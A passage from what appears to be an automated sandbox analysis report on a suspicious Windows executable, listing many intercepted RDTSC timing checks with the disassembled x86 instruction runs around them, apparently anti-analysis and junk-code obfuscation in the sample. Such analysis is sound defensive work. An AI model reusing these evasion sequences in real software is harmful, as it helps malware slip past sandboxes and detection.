0x0000006e pop eax 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F94D58 second address: F94D5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F94D5D second address: F94D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F95D57 second address: F95D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F95D5B second address: F95D77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344F55AB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F95D77 second address: F95D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5344E5026Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F94EBE second address: F94EC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F96DBA second address: F96E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F5344E50275h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F5344E50268h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D342Ch], eax 0x0000002d push 00000000h 0x0000002f mov ebx, esi 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007F5344E50268h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 0000001Ch 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d jo 00007F5344E50269h 0x00000053 movsx edi, si 0x00000056 xchg eax, esi 0x00000057 push edi 0x00000058 push edi 0x00000059 jmp 00007F5344E5026Ah 0x0000005e pop edi 0x0000005f pop edi 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F95EAF second address: F95EC9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5344F55AACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F5344F55AAEh 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F96E46 second address: F96E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F99062 second address: F99068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F99068 second address: F99112 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5344E5026Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007F5344E5027Eh 0x00000011 nop 0x00000012 mov ebx, 73F8CC80h 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007F5344E50268h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000017h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 mov dword ptr [ebp+122D1D96h], ebx 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 mov edi, 0A950881h 0x0000004a mov eax, dword ptr [ebp+122D013Dh] 0x00000050 pushad 0x00000051 mov dh, 39h 0x00000053 add cl, FFFFFFB5h 0x00000056 popad 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push ecx 0x0000005c call 00007F5344E50268h 0x00000061 pop ecx 0x00000062 mov dword ptr [esp+04h], ecx 0x00000066 add dword ptr [esp+04h], 00000019h 0x0000006e inc ecx 0x0000006f push ecx 0x00000070 ret 0x00000071 pop ecx 0x00000072 ret 0x00000073 adc edi, 58FA83ECh 0x00000079 mov bh, dh 0x0000007b push eax 0x0000007c pushad 0x0000007d pushad 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F99112 second address: F99118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA1761 second address: FA1773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5344E5026Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9B127 second address: F9B12B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9E810 second address: F9E814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9B12B second address: F9B19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 je 00007F5344F55AA6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jng 00007F5344F55AA8h 0x00000018 push esi 0x00000019 pop esi 0x0000001a popad 0x0000001b nop 0x0000001c xor dword ptr [ebp+122D312Eh], eax 0x00000022 push dword ptr fs:[00000000h] 0x00000029 mov ebx, ecx 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov dword ptr [ebp+122D2F02h], esi 0x00000038 mov eax, dword ptr [ebp+122D0549h] 0x0000003e mov di, 3958h 0x00000042 push FFFFFFFFh 0x00000044 je 00007F5344F55AAFh 0x0000004a jng 00007F5344F55AA9h 0x00000050 and bh, FFFFFFB4h 0x00000053 mov dword ptr [ebp+122D1E32h], eax 0x00000059 push eax 0x0000005a jg 00007F5344F55ABBh 0x00000060 pushad 0x00000061 jmp 00007F5344F55AADh 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA3F1B second address: FA3F21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA203B second address: FA2041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA2041 second address: FA2045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA4130 second address: FA4134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA94A6 second address: FA94B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F5344E50266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAC383 second address: FAC3C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344F55AB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jng 00007F5344F55AA8h 0x00000010 jmp 00007F5344F55AB1h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jne 00007F5344F55AA6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8ECD second address: FB8ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8ED1 second address: FB8EDC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8EDC second address: FB8F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5344E5026Fh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c jmp 00007F5344E5026Ch 0x00000011 popad 0x00000012 push ecx 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8F03 second address: FB8F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8F09 second address: FB8F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB81A8 second address: FB81AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB849A second address: FB84AE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5344E5026Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB84AE second address: FB84BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8606 second address: FB860A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB860A second address: FB8610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB88FC second address: FB8902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8902 second address: FB8907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8A7D second address: FB8A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8A83 second address: FB8A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8A87 second address: FB8A9C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push edi 0x0000000d pop edi 0x0000000e ja 00007F5344E50266h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8A9C second address: FB8AA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8DAA second address: FB8DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBD174 second address: FBD18A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5344F55AB1h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBD18A second address: FBD194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5344E50266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBD194 second address: FBD198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBD308 second address: FBD30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBD30C second address: FBD338 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5344F55AA6h 0x00000008 jmp 00007F5344F55AABh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5344F55AB1h 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBD338 second address: FBD34F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344E50273h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBD4C7 second address: FBD4E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344F55AB7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBD766 second address: FBD77F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5344E50273h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBDD13 second address: FBDD1B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBE136 second address: FBE147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5344E5026Ah 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBE147 second address: FBE153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F5344F55AA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBE153 second address: FBE157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBE157 second address: FBE15B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6590 second address: FC65A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5344E50271h 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC66DC second address: FC66E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC66E0 second address: FC66E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC66E4 second address: FC66EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC66EA second address: FC66F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC66F0 second address: FC6710 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5344E64006h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6857 second address: FC6880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5344F55E06h 0x0000000a jc 00007F5344F55E06h 0x00000010 popad 0x00000011 jmp 00007F5344F55E18h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6A22 second address: FC6A28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6A28 second address: FC6A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6A2C second address: FC6A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6B6D second address: FC6B94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344F55E0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F5344F55E0Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6B94 second address: FC6BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F5344E64000h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6CE0 second address: FC6D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F5344F55E16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6FE6 second address: FC6FEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6FEB second address: FC6FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5344F55E0Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC6FFB second address: FC7009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007F5344E63FF6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC7161 second address: FC71A6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5344F55E20h 0x00000008 jng 00007F5344F55E1Dh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC72DE second address: FC72F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5344E64004h 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC7707 second address: FC770D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC770D second address: FC7724 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344E64003h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC600D second address: FC6035 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344F55E0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5344F55E11h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8F1B9 second address: F8F1BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8F1BF second address: F8F242 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344F55E0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007F5344F55E1Eh 0x00000010 pushad 0x00000011 js 00007F5344F55E06h 0x00000017 jmp 00007F5344F55E10h 0x0000001c popad 0x0000001d nop 0x0000001e mov ecx, dword ptr [ebp+122D297Bh] 0x00000024 lea eax, dword ptr [ebp+12480EB5h] 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F5344F55E08h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 sub edi, dword ptr [ebp+122D297Bh] 0x0000004a mov cx, di 0x0000004d nop 0x0000004e ja 00007F5344F55E0Ah 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 je 00007F5344F55E0Ch 0x0000005d jp 00007F5344F55E06h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8F242 second address: F8F248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8FD81 second address: F8FD87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8FD87 second address: F8FD8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8FD8B second address: F8FDF7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5344F55E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F5344F55E08h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 xor dword ptr [ebp+122D34BBh], edx 0x0000002f push 00000004h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007F5344F55E08h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000015h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F5344F55E12h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9013B second address: F90141 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F90141 second address: F90145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F903E2 second address: F90431 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5344E63FF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5344E64008h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 je 00007F5344E63FF8h 0x00000018 pushad 0x00000019 popad 0x0000001a push edx 0x0000001b jl 00007F5344E63FF6h 0x00000021 pop edx 0x00000022 popad 0x00000023 mov eax, dword ptr [esp+04h] 0x00000027 push ecx 0x00000028 jbe 00007F5344E63FF8h 0x0000002e push eax 0x0000002f pop eax 0x00000030 pop ecx 0x00000031 mov eax, dword ptr [eax] 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jnc 00007F5344E63FF6h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9059B second address: F6C9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 nop 0x00000007 jmp 00007F5344F55E0Eh 0x0000000c add ecx, 23E12100h 0x00000012 call dword ptr [ebp+122D285Ch] 0x00000018 pushad 0x00000019 jne 00007F5344F55E14h 0x0000001f pushad 0x00000020 jnl 00007F5344F55E06h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCB6FB second address: FCB701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCB701 second address: FCB74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F5344F55E18h 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop eax 0x0000000e jns 00007F5344F55E12h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5344F55E14h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCB74B second address: FCB755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F5344E63FF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCB755 second address: FCB759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCB759 second address: FCB778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5344E64007h 0x0000000d rdtsc
